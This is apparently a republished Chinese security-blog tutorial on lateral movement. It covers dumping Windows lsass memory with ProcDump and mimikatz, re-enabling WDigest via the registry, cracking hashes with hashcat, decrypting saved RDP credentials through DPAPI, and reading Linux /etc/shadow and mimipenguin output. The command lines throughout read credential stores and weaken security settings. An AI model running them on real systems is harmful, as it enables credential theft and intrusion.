内网横向移动—WinLinux内存离线读取Hashcat破解RDPSSH存储提取

news2024/11/16 2:37:07

内网横向移动—Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取

  • 1. 前言
  • 2. Windows系统密码提取
    • 2.1. 在线读取
    • 2.2. 离线读取
      • 2.2.1. 无存储读取
        • 2.2.1.1. 读取文件
        • 2.2.1.2. 本地解密
      • 2.2.2. 有存储读取
    • 2.3. 解决高版本
      • 2.3.1. 修改注册表
      • 2.3.2. 重新登陆
    • 2.4. HASH破解
      • 2.4.1. 在线破解
      • 2.4.2. 本地破解
        • 2.4.2.1. 字典破解
        • 2.4.2.2. 暴力破解
    • 2.5. RDP凭据抓取
      • 2.5.1. 查看连接记录
      • 2.5.2. 查找本地的Credentials
      • 2.5.3. 查找guidMasterKey值
      • 2.5.4. 记录MasterKey
      • 2.5.5. 解密票据
  • 3. Linux系统密码提取
    • 3.1. 密码读取
    • 3.2. 密码破解
      • 3.2.1. 判断密码类型
      • 3.2.2. 加密形式破解
    • 3.3. SSH密钥

1. 前言

  关于SSH的密钥问题,本来想着先把关于SSH密钥的破解以及横向移动方式总结出来的,但是网上关于Linux系统横向移动手法,以及利用都太少了,目前也没看到很好的文章,很多问题确实把相关知识点总结了,但是感觉还是有点乱,所以就先把Linux横向移动方式先暂停,暂时不去总结Linux方面的横向移动。

  不过关于Linux方面的横向移动还是可以带一下的,因为从系统角度来说,Linux中横向移动的可利用方式确实少,正常情况下Linux系统利用多数都是利用Linux系统中安装的中间件软件等来实现横向移动。

2. Windows系统密码提取

  在Windows server 2012系统包括之后,微软为了防止明文密码泄露,就推出了一个补丁KB2871997,关闭了wdiges功能。也就是说当系统是Windows 10及Windows server 2012以上的时候,默认在内存缓存中不存储明文密码。

2.1. 在线读取

  其实这里在线读取也就是使用CS中自带的工具进行hash抓取以及读取明文密码,但是这里可以看到只能读取到hash值,并不是读取到明文密码。

在这里插入图片描述

  同时可以看到密码位置全部都是null,也就是空,是真实没有密码吗?其实就是由于Windows server 2012的版本问题,导致读取不到明文而已。

在这里插入图片描述

2.2. 离线读取

  通常来说使用mimikatz是会被杀的,而这时候我们可以使用微软官方的工具来进行读取,主要是针对在读取密码的时候被杀,而由于这个工具是微软的工具,所以可以免杀,不会被杀。

  ProcDump

  mimikatz

2.2.1. 无存储读取

  这里的无存储读取就是和上面差不多就是在正常读取的情况下,无法读取到明文密码。

2.2.1.1. 读取文件

  这里首先需要将工具上传到Windows server 2012上面进行运行,如何将运行后的文件导出来,再利用mimikatz进行读取。

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

在这里插入图片描述

2.2.1.2. 本地解密

  当上面命令执行后,会再当前目录出现一个文件名字为:lsass.dmp,当然名字是自己写的,但是后面的后缀是一定的。

  这里我们再运行本地的文件,导入密码,在进行读取,这里就是避免了被杀的风险,不过这里并不能读取到明文密码,还是读取的是hash值。

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full

在这里插入图片描述

2.2.2. 有存储读取

  关于有存储读取和无存储读取的操作是一样的,只是不同的是,需要管理员进行过登录,由于我演示的时候,采用的是DC就是Windows server 2012,所以导致无法使用激活管理员登陆,所以就不演示的。

  总的来说是一模一样的,这里我放一张别人的图片。

在这里插入图片描述

2.3. 解决高版本

  在前面一直说高版本无法读取明文密码,那么该怎么办,其实这里可以通过修改注册表来实现,然后强制锁屏,等待管理员重新登陆账号密码。

2.3.1. 修改注册表

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

在这里插入图片描述

2.3.2. 重新登陆

  这里我们锁屏然后重新登陆,再进行密码抓取,可以看到这里是成功获取到密码了。

在这里插入图片描述

2.4. HASH破解

  当然啦,这里也可以对HASH密码进行破解。

2.4.1. 在线破解

  在线破解就是通过一些在线网站进行破解,不过有些是需要钱的。

https://www.somd5.com/
https://www.cmd5.com/

在这里插入图片描述

2.4.2. 本地破解

  关于本地破解,怎么说呢,需要有一个超大的密码本,部分情况下需要强大的CPU与GPU来进行运算。

  hashcat是一款可以基于显卡暴力破解密码的工具,几乎支持了所有常见的加密,并且支持各种姿势的密码搭配
kali Linux中自带的有,也支持Windows Mac平台

  这里我们就简单的来说说用法吧,具体用法可以自行去网上搜索,或者后期有时候来写一篇专门的总结吧!同时要注意哦,我使用了代理依旧下载很吗,所以需要等等。

  hashcat

2.4.2.1. 字典破解

  这里需要将hash值复制进去,pass密码本也要准备好,主要就是看电脑的性能来进行破解了。

hashcat.exe -a 0 -m 1000 hash.txt pass.txt

在这里插入图片描述

2.4.2.2. 暴力破解

  暴力破解是能够破解成功的,不过需要超高的CPU与GPU的计算,尤其是一些又长又复杂的密码,下面是密码的组合。

-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字

  这里就需要知道密码是多少位,第一位是大写还是小写,第二位是数字还是字母,我总感觉有点不对劲,实战中我怎么知道第一位是数字还是字母还是大写小写,这有很多组合呀。

  比如我这个admin@123,完全是理想化的,写法如下:

hashcat.exe -a 3 -m 1000 579da618cfbfa85247acf1f800a280a4 ?l?l?l?l?l?s?d?d?d

  如果允许不了将上面测试的密码记录删除即可。

在这里插入图片描述

2.5. RDP凭据抓取

  RDP是有一个保存凭据的选项的,正常情况下有些管理员为了方便会勾选凭据。

在这里插入图片描述

2.5.1. 查看连接记录

  这里通过命令可以查看到连接记录。

cmdkey /list

在这里插入图片描述

2.5.2. 查找本地的Credentials

  将这里的值记录下来。

dir /a %userprofile%\appdata\local\microsoft\credentials\*

在这里插入图片描述

2.5.3. 查找guidMasterKey值

  这里需要将目标的Credentials记录guidMasterKey值记录下来,还有这里前面的路径一定要更具自己的路径来,不要直接复制粘贴,否则会出现错误。

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718

在这里插入图片描述

2.5.4. 记录MasterKey

  这里需要将guidMasterKey对应的MasterKey记录下来。

mimikatz sekurlsa::dpapi

在这里插入图片描述

2.5.5. 解密票据

  这里仔细看命令,是需要相互结合起来的。

mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718 /masterkey:8a5b068bf179d5617421dc04bd2b310d319badf9d79421e7c0a9bf685317f23b1f7be9666983ca3af76939256c2267ba0d4ab600962e4940fcf09be61d101c1d

在这里插入图片描述

3. Linux系统密码提取

  关于Linux系统的密码提前其实是挺少的,而且成功率也低。

3.1. 密码读取

  这个不一定成功哦,这里我也是运行后一直没反应。

  mimipenguin

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

在这里插入图片描述

3.2. 密码破解

  密码破解其实就是和上面Windows密码破解是一样的。

3.2.1. 判断密码类型

  这里通过查看root加密来判断类型,我实在是没搜到我这个y是什么加密。

  判断加密类型

cat /etc/shadow

在这里插入图片描述

3.2.2. 加密形式破解

linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt

3.3. SSH密钥

  关于SSH密钥后面有空出一篇总结,个人感觉还挺复杂的,还在理解中。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/855478.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Unity3d C#利用本地网页快速打开萤石云监控视频流(ezopen)实现云台,声音等控制,支持WebGL平台,替代UMP播放(含源码)

前言 之前我介绍了替代Universal?Media?PlayerUMP播放石云监控视频流(ezopen)的功能,效果还是很明显的,笔者的测试是差不多3-5秒就能打开监控画面,不过稍微遗憾的是,之前的功能是iframe打开石云提供的播放网页的形式&#xff0…

SSM——环境搭建、产品操作、订单操作

SSM 环境搭建与产品操作 1. 环境准备 1.1 数据库与表结构 1.1.1 创建用户与授权 数据库我们使用 Oracle Oracle 为每个项目创建单独 user , oracle 数据表存放在表空间下,每个用户有独立表空间 创建用户及密码 语法 [ 创建用户 ] : crea…

js 正则表达式

js 正则表达式 http://tool.oschina.net/regex https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Guide/Regular_Expressions 11 22

【大厂面试必备】网络收发数据及断开服务器(四次挥手)

接上一篇:【网络知识面试】初识协议栈和套接字及连接阶段的三次握手  前面我们了解到服务器和客户端在创建套接字,建立连接后,就可以进入到下一步,双发可以互相发送和接收数据,本篇博客就来学习一下这个过程。  我们…

C++初阶——拷贝构造和运算符重载(const成员)

目录 1. 拷贝构造函数 1.2 拷贝构造函数特征: 2. 默认拷贝构造函数 2.1 未显式定义,编译器会生成默认的拷贝构造函数。 默认的拷贝构造函数对象按内存存储按字节序完成拷贝,这种拷贝叫做浅拷贝,或者值拷贝 3. 运算符重载 3.1…

机器人CPP编程基础-01第一个程序Hello World

很多课程先讲C/C或者一些其他编程课,称之为基础课程。然后到本科高年级进行机器人专业课学习,这样时间损失非常大,效率非常低。 C/单片机/嵌入式/ROS等这些编程基础可以合并到一门课中进行实现,这些素材已经迭代三轮以上&#xf…

C# Equals()方法报错:NullReferenceException was unhandled

下面是一个C# Equals()方法的例子,执行时报错了 static void Main(string[] args) {string name "sandeep";string myName null;Console.WriteLine(" operator result is {0}", name myName);Console.WriteLine("Equals method result…

中通快递:短期财务前景良好,长期财务业绩将遭受严重打击

来源:猛兽财经 作者:猛兽财经 华尔街分析师对中通快递的短期财务前景预测 华尔街分析师目前预测中通快递(ZTO)将在2023财年全年产生一份相当不错的财务业绩。 根据S&P Capital IQ的数据,在过去的6个月里&#xff…

代码随想录算法训练营第24天| 第七章 回溯算法part01 理论基础、leetcode 77

Part I : 回溯算法基础 背景:一直以来都是半懂不懂的,在逻辑上不难,毕竟属于暴力搜索;在代码上就开始缠绕起来了,自己研究的时候对N皇后问题老是理不清。这次终于在Carl这开始前进啦!何为回溯算法&#xf…

【C++】STL——set/multiset 和 map/multimap的使用

文章目录 1. 关联式容器2. 树形结构的关联式容器3. set3.1 认识set3.1 set的使用 4. multiset5. map5.1 认识map5.2 pair5.3 map的使用对map中[]的理解 6. multimap 1. 关联式容器 在初阶阶段,我们已经接触过STL中的部分容器 比如:vector、list、deque、…

VoxWeekly|The Sandbox 生态周报|20230807

欢迎来到由 The Sandbox 发布的《VoxWeekly》。我们会在每周发布,对上一周 The Sandbox 生态系统所发生的事情进行总结。 如果你喜欢我们内容,欢迎与朋友和家人分享。请订阅我们的 Medium 、关注我们的 Twitter,并加入 Discord 社区&#xf…

c++--AVL树简单实现

1.什么是AVL树 AVL树就是在搜索二叉树的基础上通过控制左右子树的高度差实现的,在搜索二叉树的基础上,通过旋转来控制,是左右子树高度差的绝对值严格控制为不超过1(通过旋转来控制树的高度)。由于搜索二叉树的效率最差…

一起学SF框架系列7.1-spring-AOP-基础知识

AOP(Aspect-oriented Programming-面向切面编程)是一种编程模式,是对OOP(Object-oriented Programming-面向对象编程)一种有益补充。在OOP中,万事万物都是独立的对象,对象相互耦合关系是基于业务进行的;但在…

【逗老师的PMP学习笔记】8、项目质量管理

目录 一、规划质量管理1、质量管理的发展历史2、戴明环,PDCA理论3、【关键输入】事业环境因素4、【关键输入】成本效益分析5、【关键工具】质量成本6、【关键输出】质量管理计划7、插一嘴,项目的三个标准8、【关键工具】质量测量指标 二、管理质量1、【关…

[OnWork.Tools]系列 06-屏幕水印

简介 屏幕水印功能主要是在开会分享屏幕的时候在屏幕上增加水印 水印使用 水印启用和颜色设置 水印文字和大小设置 水印间距,透明度,角度调整

保护电脑健康,这些维护技巧你Get了吗?

文章目录 1.界面环境1.1合理布置终端桌面1.2清理垃圾信息1.3关注运行环境和系统信息 2.程序管理2.1安装软件时需谨慎2.2及时更新软件和操作系统2.3合理管理插件和工具栏 3.网络防护3.1保护个人隐私3.2防范网络攻击3.3备份重要数据 4.电源管理4.1合理关机和电源设置4.2定期清理灰…

ESP32开发阶段启用 Secure Boot 与 Flash encryption

Secure Boot 与 Flash encryption详情 请参考:https://blog.csdn.net/espressif/article/details/79362094 1、开发环境 AT版本:2.4.0.0 发布IDF 与 python: idf4.3_py3.10_env系统:虚拟机 ubuntu 20 2、使能 secure boot 和 …

手搓 自然语言模型 LLM 拆分em结构设计 网络参数对比

数据 数据集 新的em编码参数表 voc_sizehidden_sizetotaltotal Bmax_lensecondsdays65536512374865920.03749B10242560.2655361024828375040.08284B20485120.5655362048<

yo!这里是STL::list类简单模拟实现

目录 前言 重要接口实现 框架 默认成员函数 迭代器&#xff08;重点&#xff09; 1.引言 2.list迭代器类实现 3.list类中调用实现 增删查改 后记 前言 我们知道&#xff0c;stl中的vector对应数据结构中的顺序表&#xff0c;string类对应字符串&#xff0c;而今天要…

Spring Data学习笔记Day01-SpringData入门

Spring Data基本介绍 目录 Spring Data Redis 官方API参考手册&#xff01;★ Spring Data的价值★ Spring Data及其子项目★ 强大的Spring Data★ Repository接口★ 具体Repository接口★ Spring Data JPA开发★ Spring Boot如何选择DataSource★ 数据源相关配置★ 配置第三方…